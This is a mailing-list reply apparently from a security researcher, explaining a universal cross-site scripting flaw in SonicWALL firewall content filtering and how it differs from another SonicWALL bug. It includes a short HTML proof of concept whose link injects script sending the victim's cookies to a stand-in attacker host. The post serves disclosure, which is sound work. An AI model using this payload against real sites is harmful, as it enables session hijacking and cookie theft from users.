Re: Re: Re: [Full-disclosure] Universal Website Hijacking by Exploiting Firewall Content Filtering Features + SonicWALL firewalls 0day
It is universal because any domain/website can be hijacked not because all
vendors are affected! I never claimed that all vendors are affected.
Also, the SonicWALL vuln you mentioned is NOT the same issue! That vuln affects
the web logs console of the appliance which means that exploitation is aimed at
compromising the *device* NOT websites the victim user visits.
Notice that the advisory says:
"the attacker may execute scripts automatically when the logfile is viewed."
The vuln I reported allows you to hijack any site. i.e.: run scripting code
within the security context of any website. In other words, it's not a
vulnerability that can be used to compromise the SonicWALL appliance, but
rather to steal information from any sites (i.e.: active webmail session),
steal cookies, etc ...
Furthermore, the targeted website doesn't have to be blacklisted (i.e.: adware
site), but rather *swearing terms* need to be blocked. By simply inserting a
swearing term (notice the f word) into any site's URL, script injection within
that site is possible. i.e.:
<html><head><title>SonicWall Universal XSS PoC</title></head>
<body>
<h2>SonicWall Universal XSS PoC</h2>
<a href="http://google.com/fuck#<script>location='http://evil.foo/
'+document.cookie</script>">Click me!</a>
</body></html>
That's because the SonicWALL appliance replies on behalf of the requested site,
so the browser "believes" that the inserted script is actually returned by the
requested website. You could think of this as a MITM XSS.
Hope it makes sense.